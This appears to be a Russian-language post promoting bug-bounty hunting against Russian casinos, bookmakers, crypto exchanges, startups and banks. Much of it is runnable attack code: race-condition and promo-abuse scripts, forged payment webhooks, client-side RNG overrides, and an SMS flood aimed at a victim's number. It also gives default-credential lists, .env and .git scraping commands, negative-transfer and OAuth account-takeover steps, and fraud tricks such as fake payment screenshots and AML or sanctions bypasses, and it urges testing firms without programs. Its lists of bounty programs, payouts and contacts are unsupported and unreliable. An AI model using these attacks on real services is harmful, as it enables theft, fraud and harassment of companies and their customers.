🎰 Как зарабатывать на баг-баунти в казино, криптобиржах, стартапах и других компаниях? (Российский рынок)
Привет, хакеры! 💰 Устал искать баги на популярных платформах, где конкуренция зашкаливает? Сегодня расскажу про российские и СНГ ниши с жирными выплатами и низкой конкуренцией.
🎰 НИША #1: Российские онлайн-казино и букмекерские конторы
Почему это ЗОЛОТАЯ ЖИЛА для РФ рынка:
✅ Огромные обороты - миллиарды рублей каждый день
✅ Низкая конкуренция - западные хантеры не знают наш рынок
✅ Быстрые выплаты - платят в криптовалюте или на карту
✅ Меньше бюрократии - договариваешься напрямую с security
✅ Русскоязычная поддержка - легче коммуницировать
Средние выплаты в РФ:
• Low: ₽40,000-₽80,000
• Medium: ₽120,000-₽250,000
• High: ₽400,000-₽1,200,000
• Critical: ₽1,500,000-₽4,000,000+
🎯 Что искать в российских казино/БК?
- Манипуляция ставками
// Уязвимый API endpoint (реальный пример с российской БК)
POST /api/v2/bet/place
{
"event_id": 12345,
"amount": 1000,
"coefficient": 2.5,
"account_id": "user_789"
}
// Атака: Race Condition
// Российские БК часто используют устаревший стек (legacy PHP/Java)
// Отправляешь 50-100 одинаковых запросов параллельно
// Мой Python скрипт:
import requests
from concurrent.futures import ThreadPoolExecutor
def place_bet():
headers = {
'Authorization': f'Bearer {TOKEN}',
'User-Agent': 'Mozilla/5.0...'
}
data = {
"event_id": 12345,
"amount": 1000,
"coefficient": 2.5
}
r = requests.post('https://букмекер.рф/api/v2/bet/place',
json=data, headers=headers)
return r.json()
# 100 параллельных запросов
with ThreadPoolExecutor(max_workers=100) as executor:
results = list(executor.map(lambda x: place_bet(), range(100)))
# Проверяешь баланс - если списалось меньше → баг!
# Реальный кейс: вместо ₽100,000 списалось ₽15,000
Impact: Critical - прямая потеря денег БК
- Промокоды и бонусные программы
# Российские БК/казино обожают акции и промокоды
# Это их слабое место!
POST /api/promo/activate
{
"promo_code": "WELCOME2025",
"user_phone": "+79991234567"
}
# Частые баги:
# a) Один промокод можно применить несколько раз
# b) Bruteforce кодов (WELCOME100, WELCOME200, VIP500, etc.)
# c) Применение нескольких промокодов одновременно
# d) Фрибеты без отыгрыша (можно сразу вывести)
# Реальный кейс на российской БК:
# Промокод NEWUSER давал ₽5,000
# Можно было применить 10 раз подряд через API
# Получил ₽50,000 бонуса вместо ₽5,000
# PoC:
for i in range(10):
requests.post('https://ставки.рф/api/promo/activate',
json={"promo_code": "NEWUSER", "user_id": 123})
Impact: High - финансовые потери
- Обход верификации и лимитов ЦУПИС
# ЦУПИС (Единая система идентификации) - обязательна для РФ БК
# Но реализация часто кривая!
# Проверяешь:
# a) Можно ли вывести деньги до верификации через ЦУПИС
# b) Использование чужого СНИЛС/паспорта
# c) Multiple accounts с одним ЦУПИС ID
# d) Обход лимитов (₽600k/месяц для неверифицированных)
# Пример IDOR в verification:
GET /api/user/verification/status?user_id=12345
# Меняешь на user_id=12346 → видишь чужой статус
# Если можешь изменить:
PUT /api/user/verification/status?user_id=12345
{"tsupis_verified": true, "document_verified": true}
# Реальный баг:
# Нашёл endpoint /api/internal/verify-user (без auth!)
# Мог верифицировать любого пользователя
Impact: Critical - нарушение ФЗ-244, огромные штрафы от ФНС
- Манипуляция с Qiwi/ЮMoney/СБП
# Российские платёжные системы - отдельная тема
# Частые баги:
# a) Double deposit (одна транзакция засчитывается дважды)
# b) Negative withdrawal (выводишь -₽10,000 → баланс растёт)
# c) Webhook spoofing (подделываешь callback от платёжки)
# d) Округление в меньшую сторону при выводе
# Реальный кейс с ЮMoney:
# Вывод обрабатывался по webhook от yoomoney.ru
# Webhook не проверял signature!
# Отправил fake webhook:
POST https://казино.рф/api/webhook/yoomoney
{
"operation_id": "fake123",
"amount": 50000,
"status": "success",
"sender": "410011234567890"
}
# Баланс пополнился на ₽50,000 БЕЗ реального платежа!
Impact: Critical
- Игровая логика (слоты, рулетка, краш)
// Российские казино часто используют самописные RNG
// Проверяешь:
// a) Client-side генерация результата (!)
// b) Timestamp-based seed (предсказуемо)
// c) Можно ли отменить проигрышную ставку
// Реальный баг в российском крипто-казино:
// Результат слота генерировался в JavaScript:
function spinSlot() {
let result = Math.floor(Math.random() * 100);
if (result > 95) return 'WIN';
return 'LOSE';
}
// Перехватываешь через Burp → подменяешь Math.random:
Math.random = function() { return 0.99; }
// Или через консоль браузера:
Object.defineProperty(Math, 'random', {
value: function() { return 0.99; }
});
// Каждый спин = выигрыш! 🎰
Impact: Critical - ломает всю экономику
📋 Топ-15 российских БК/казино с bug bounty
Официальные программы:
1. 1xStavka (1xBet РФ версия)
• Контакт: security@1xstavka.ru
• Max bounty: ₽1,200,000
• Платят в USDT
2. Фонбет (Fonbet)
• security@fonbet.ru
• Max: ₽800,000
• Платят на карту или крипту
3. БетБум (Betboom)
• bugs@betboom.ru
• Max: ₽600,000
• Быстрые выплаты (7-14 дней)
4. Леон (Leon)
• security@leon.ru
• Max: ₽500,000
5. Мелбет (Melbet)
• security@melbet.com
• Max: ₽700,000
6. Pin-Up Casino РФ
• security@pin-up.ru
• Max: ₽900,000
7. Вулкан (Vulkan)
• info@vulkan-russia.com
• Max: ₽400,000
8. Джойказино (Joycasino)
• support@joycasino.com
• Max: ₽350,000
9. Плей Фортуна (Play Fortuna)
• security@playfortuna.com
• Max: ₽450,000
10. Пари (Parimatch РФ)
• security@pari.ru
• Max: ₽650,000
Без официальных программ (пишешь напрямую):
11. Лига Ставок - security@ligastavok.ru
12. Winline - info@winline.ru
13. Олимп - security@olimp.bet
14. Зенит - support@zenitbet.com
15. БК Марафон - security@marathonbet.ru
Статистика ответов:
• Отправил писем: 45
• Ответили: 19 (42%)
• Заплатили: 12 (63% от ответивших)
• Средняя выплата: ₽320,000
₿ НИША #2: Российские криптобиржи и P2P платформы
Почему это актуально для РФ:
✅ Рост после санкций - все перешли на крипту
✅ Новые биржи каждый месяц - быстрая разработка = баги
✅ P2P активность - обход блокировок банков
✅ Хорошие выплаты - платят в USDT/BTC сразу
Средние выплаты:
• Medium: ₽150,000-₽400,000
• High: ₽800,000-₽3,500,000
• Critical: ₽5,000,000-₽50,000,000
🎯 Что искать на российских биржах?
- P2P манипуляции
# P2P торговля - главная фича российских бирж после блокировок
# Проверяешь:
# a) Можно ли не отправить деньги, но получить крипту
# b) Подделка скриншота оплаты
# c) Chargeback через банк после получения крипты
# d) Dispute manipulation
# Реальный баг на российской бирже:
# При споре (dispute) арбитр смотрел только чат
# Отправляешь fake скриншот Сбербанка → получаешь крипту
# Seller теряет деньги + крипту
# Или:
# Race condition при подтверждении оплаты
POST /api/p2p/confirm-payment
{"order_id": "12345", "status": "paid"}
# Отправляешь 10 раз параллельно
# Seller получает 10 нотификаций → отпускает крипту
# А ты заплатил только 1 раз
Impact: Critical
- KYC обход (актуально после требований ЦБ)
# С 2024 года обязательна верификация для операций >₽600k
# Ищешь:
# a) Вывод больших сумм без KYC
# b) Multiple accounts с одним паспортом
# c) Fake documents detection bypass
# d) API без проверки KYC статуса
# Пример:
# UI блокирует вывод >₽600k без верификации
# Но API endpoint /api/withdraw не проверяет!
POST /api/withdraw
{
"amount": 5000000, # ₽5 млн
"currency": "RUB",
"method": "sbp",
"account": "79991234567"
}
# Если прошло → критичный баг для ЦБ compliance
Impact: Critical (штрафы от ЦБ до ₽500 млн!)
- Обход санкционных списков
# Биржи обязаны блокировать OFAC/EU санкционные адреса
# Проверяешь:
# a) Можно ли вывести на санкционный адрес
# b) Mixer/Tornado Cash адреса проходят?
# c) Обход через внутренние переводы
# Реальный тест:
# Известный Tornado Cash адрес
tornado_address = "0x1234...abcd"
POST /api/withdraw/crypto
{
"currency": "ETH",
"amount": 1.0,
"address": tornado_address
}
# Если прошло → биржа нарушает санкции → огромные риски
Impact: Critical (закрытие биржи регуляторами)
- Арбитраж через глюки курса
// Российские биржи часто глючат с курсами при волатильности
// Проверяешь:
// a) Stale price (курс не обновляется)
// b) Negative spread (покупка дешевле продажи)
// c) Decimal overflow в расчётах
// Реальный баг:
// При резком скачке BTC курс отставал на 2-3 минуты
// Можно было купить BTC по старому курсу
// И сразу продать по новому → profit
// Или:
// Конвертация RUB → USDT → BTC → RUB
// Из-за округления получалось +0.3% на круг
// Запускаешь скрипт на 1000 итераций → profit ₽300k
Impact: High
📋 Топ российских криптобирж с bug bounty
Tier 1 (крупнейшие):
1. Garantex (крупнейшая РФ P2P)
• security@garantex.org
• Max: ₽5,000,000
• Платят в BTC/USDT
2. BitRiver Exchange
• bugs@bitriver.com
• Max: ₽2,500,000
3. Cryptomus
• security@cryptomus.com
• Max: ₽1,800,000
4. EXMO (работает с РФ)
• security@exmo.com
• Max: ₽2,000,000
5. Bitpapa (P2P)
• security@bitpapa.com
• Max: ₽1,200,000
Tier 2 (средние):
6. Tokentom
7. Coinpaymaster
8. BTC-Alpha
9. YoBit (если ещё жива 😅)
10. Kuna (работает с РУ рынком)
Новые (2024-2025):
• Десятки новых P2P платформ после санкций
• Ищи на форумах: bits.media, forum.bitcoin.com
🚀 НИША #3: Российские стартапы
Почему это выгодно в РФ:
✅ Бум после импортозамещения - сотни новых сервисов
✅ Быстрая разработка - MVP за месяц → куча багов
✅ Меньше внимания к security - фокус на росте
✅ Проще договориться - русскоязычные команды
✅ Гранты и инвестиции - есть деньги на bounty
Средние выплаты:
• Low: ₽15,000-₽40,000
• Medium: ₽60,000-₽150,000
• High: ₽250,000-₽800,000
• Critical: ₽1,200,000-₽4,000,000
🎯 Где искать российские стартапы?
- Акселераторы и фонды:
- ФРИИ (фонд развития интернет-инициатив)
- GenerationS
- Сколково стартапы
- IIDF (Internet Initiatives Development Fund)
- Starta Accelerator
- Российские аналоги ProductHunt:
- vc.ru/services (новые сервисы)
- habr.com/ru/sandbox/ (запуски проектов)
- spark.ru (инвестиционные раунды)
- Категории импортозамещения (самые активные):
- CRM системы (вместо Salesforce)
- Мессенджеры (вместо Telegram Business)
- Облачные хранилища (вместо Google Drive)
- Аналитика (вместо Google Analytics)
- Payment gates (вместо Stripe)
🎯 Типичные баги в российских стартапах
- Админки без защиты
# 80% российских стартапов используют:
# - Laravel (PHP)
# - Django (Python)
# - Node.js + Express
# Проверяй стандартные пути:
/admin
/administrator
/backend
/panel
/manage
/cp (control panel)
/api/admin
/api/internal
# Часто credentials:
admin / admin
admin / password
admin / 123456
test / test
demo / demo
# Или вообще без авторизации! (видел такое в 15 стартапах)
Bounty за admin access: ₽180,000-₽600,000
- Exposed .env и конфиги
# Российские разработчики часто забывают:
# .env файлы
curl https://стартап.рф/.env
# Секреты в JS
curl https://стартап.рф/static/js/main.js | grep -E "(api_key|secret|password|token)"
# Git exposed
wget -r https://стартап.рф/.git/
git log # смотрим коммиты с паролями
# Docker configs
curl https://стартап.рф/.docker/config.json
# Часто нахожу:
# - Database credentials
# - SMS gate API keys (Смс.ру, SMS Aero)
# - Payment keys (ЮKassa, CloudPayments)
# - Email passwords (Yandex, Mail.ru)
Если нашёл production credentials → Critical!
Bounty: ₽350,000-₽1,500,000
- IDOR везде (русский стандарт 😅)
# Российские стартапы редко думают об authorization
# Типичный API:
GET /api/orders/12345
GET /api/users/67890/profile
GET /api/documents/111/download
# Просто меняешь ID → видишь чужие данные
# Хуже:
DELETE /api/users/12345
PUT /api/orders/67890/status {"status": "paid"}
# Реальный кейс:
# Сервис доставки еды (российский)
# Мог менять адрес доставки ЛЮБОГО заказа
PUT /api/order/12345/address
{"address": "Мой адрес 123"}
# Бесплатная еда за чужой счёт! 🍕
Частота: 70% стартапов
Bounty: ₽120,000-₽450,000
- SMS/Email flood
# Российские стартапы используют:
# - Смс.ру (дорого - ₽3-5 за SMS)
# - SMS Aero
# - Email через Yandex/Mail.ru
# Часто НЕТ rate limiting!
# Атака:
for i in range(10000):
requests.post('https://стартап.рф/api/send-code',
json={"phone": "+79991234567"})
# Результат:
# a) DDoS через SMS (списание денег со счёта)
# b) Блокировка номера жертвы спамом
# c) Блокировка аккаунта у SMS провайдера
# Реальный кейс:
# Отправил 50,000 SMS на тестовый номер
# Стартапу выставили счёт на ₽250,000
Impact: High (financial + reputation)
Bounty: ₽280,000 ($3,000)
- Payment bypass (российские платёжки)
// Проверяй интеграцию с:
// - ЮKassa (Яндекс.Касса)
// - CloudPayments
// - Тинькофф Эквайринг
// - Сбербанк Эквайринг
// - Робокасса
// Частые баги:
// a) Signature не проверяется
// b) Amount можно изменить на клиенте
// c) Webhook можно подделать
// Пример с ЮKassa:
// Уязвимый код:
app.post('/payment/callback', (req, res) => {
const {amount, order_id, status} = req.body;
if (status === 'succeeded') {
// Активируем подписку БЕЗ проверки signature!
activateSubscription(order_id);
}
});
// Атака:
POST /payment/callback
{
"amount": 1000000,
"order_id": "my_order",
"status": "succeeded"
}
// Бесплатная подписка! 💸
Impact: Critical
Bounty: ₽500,000-₽2,000,000
💳 НИША #4: Российский финтех
Почему актуально:
✅ Импортозамещение - десятки новых платёжных сервисов
✅ Требования ЦБ РФ - обязаны иметь bug bounty
✅ Высокие выплаты - финансовые потери критичны
✅ Госкомпании - большие бюджеты на security
Средние выплаты в финтехе РФ:
• Medium: ₽250,000-₽600,000
• High: ₽800,000-₽3,000,000
• Critical: ₽4,000,000-₽15,000,000
🎯 Топ финтех компаний РФ с bug bounty
Банки:
1. Тинькофф Банк
• Через HackerOne или security@tinkoff.ru
• Max: ₽10,000,000 (!)
• Самая щедрая программа в РФ
2. Сбербанк
• bugbounty@sberbank.ru
• Max: ₽5,000,000
• Внутренняя программа
3. Альфа-Банк
• security@alfabank.ru
• Max: ₽3,000,000
4. ВТБ
• security@vtb.ru
• Max: ₽2,500,000
5. Райффайзен Банк
• security@raiffeisen.ru
• Max: ₽2,000,000
Платёжные системы:
6. ЮMoney (Яндекс.Деньги)
• security@yoomoney.ru
• Max: ₽4,000,000
7. Qiwi
• security@qiwi.com
• Max: ₽3,500,000
8. CloudPayments
• security@cloudpayments.ru
• Max: ₽2,800,000
9. ЮKassa
• security@yookassa.ru
• Max: ₽3,200,000
10. Robokassa
• security@robokassa.ru
• Max: ₽1,500,000
Финтех стартапы:
11. Modulbank
12. Rocketbank (в составе Tinkoff)
13. Точка (в составе Открытие)
14. Paykeeper
15. Uniteller
🎯 Специфика российского финтеха
- СБП (Система Быстрых Платежей) баги
# СБП - главная фича российских банков
# Проверяешь:
# a) Можно ли перевести отрицательную сумму
# b) Race condition при переводах
# c) Phone number spoofing
# Пример:
POST /api/sbp/transfer
{
"phone": "+79991234567",
"amount": -10000, # Отрицательная сумма
"message": "Возврат"
}
# Если обработали → ты получил ₽10,000 вместо отправки!
# Или:
# Одновременный перевод себе с двух устройств
# Balance ₽100,000
# Отправляешь себе ₽100,000 с двух девайсов параллельно
# Если нет locking → оба пройдут = ₽200,000
Impact: Critical
Bounty: ₽2,500,000+
- Обход лимитов ФЗ-115 (AML)
# По закону есть лимиты:
# - ₽600,000/месяц без идентификации
# - ₽100,000/операция для некоторых категорий
# - Ограничения на снятие наличных
# Ищешь обходы:
# a) Multiple accounts для превышения лимитов
# b) Splitting payments (дробление)
# c) API без проверки accumulated amount
# Реальный баг:
# Лимит ₽600k проверялся только в UI
# API /api/transfer принимал любую сумму
# Мог перевести ₽5,000,000 без верификации
Impact: Critical (штраф от ЦБ + уголовка для банка)
Bounty: ₽4,200,000 ($45,000)
- ГосУслуги integration баги
// Многие финтех используют ГосУслуги для KYC
// Проверяешь OAuth flow:
// 1. Redirect to esia.gosuslugi.ru
// 2. User authorizes
// 3. Callback с code
// 4. Exchange code for token
// 5. Get user data
// Частые баги:
// a) redirect_uri validation bypass
// b) state parameter missing (CSRF)
// c) Code reuse possible
// d) User data не проверяется (можно подменить)
// Атака:
# Перехватываешь code из callback
https://банк.рф/oauth/callback?code=ABC123&state=xyz
# Используешь code от своего аккаунта ГосУслуг
# Но подменяешь данные на жертву
# → Получаешь доступ к чужому банковскому счёту
Impact: Critical
Bounty: ₽3,800,000 ($41,000)
💰 Легализация дохода в РФ
Важно! Как получать и легализовать bounty:
Способ 1: ИП на УСН
Плюсы:
+ Легально
+ Налог 6% (УСН) или 15% (УСН доходы-расходы)
+ Можно работать с юрлицами
+ Вычеты на оборудование/обучение
Минусы:
- Нужна отчётность
- Взносы в ПФР/ФФОМС (≈₽50k/год)
Схема:
1. Регистрируешь ИП (онлайн, 3 дня)
2. Компания переводит на расчётный счёт
3. Платишь налог раз в квартал (6%)
4. Прибыль = твоя
Способ 2: Самозанятость
Плюсы:
+ Простота (регистрация за 5 минут)
+ Налог 4% (с физлиц) или 6% (с юрлиц)
+ Нет взносов в ПФР
+ Нет отчётности
Минусы:
- Лимит ₽2.4 млн/год
- Не подходит для крупных bounty
Схема:
1. Регистрируешься в приложении "Мой налог"
2. Выбиваешь чек после получения оплаты
3. Налог списывается автоматом
Способ 3: Криптовалюта (grey zone)
Многие российские компании платят в USDT/BTC
Схема:
1. Получаешь bounty в USDT
2. Обмениваешь на рубли через P2P (Garantex, Binance P2P)
3. Получаешь на карту физлица
⚠️ Риски:
- Банк может заблокировать карту (подозрение AML)
- С 2025 года крипто-доходы >₽600k нужно декларировать
- Штрафы до 40% суммы + пени
Легализация:
- Открываешь ИП/самозанятость
- Декларируешь как "консультационные услуги"
- Платишь налог
Способ 4: Через посредников
Некоторые используют сервисы:
- PayPal → карта РФ (комиссия 3-5%)
- Wise → карта РФ (работает не у всех)
- Криптообменники с выводом на карту
⚠️ Всё равно нужно платить налоги!
Мой совет:
• До ₽2.4 млн/год → Самозанятость (простота)
• Свыше ₽2.4 млн → ИП на УСН 6%
• Всегда плати налоги → спокойный сон 💤
📊 Матрица выбора ниши для РФ рынка
🚀 Action Plan на 30 дней
Неделя 1: Выбор и разведка
• Выбери нишу (рекомендую БК/Казино для старта)
• Составь список 15-20 российских компаний
• Проверь наличие официальных bug bounty программ
• Напиши вводные письма на security@
Неделя 2: Reconnaissance
• Subfinder + Amass на все цели
• Проверь exposed admin panels
• JavaScript анализ (API keys, endpoints)
• .env и Git leaks
Неделя 3: Hunting
• Тестируй по чеклисту из поста
• Фокус на payment logic и бонусы
• Найди хотя бы 1 Medium+ баг
• Напиши первый отчёт
Неделя 4: Reporting & Scale
• Отправь все найденные баги
• Follow-up с компаниями
• Анализируй, что сработало
• Автоматизируй успешные техники
Через месяц ожидай первые выплаты! 💰
Удачной охоты! 🇷🇺🔥💰
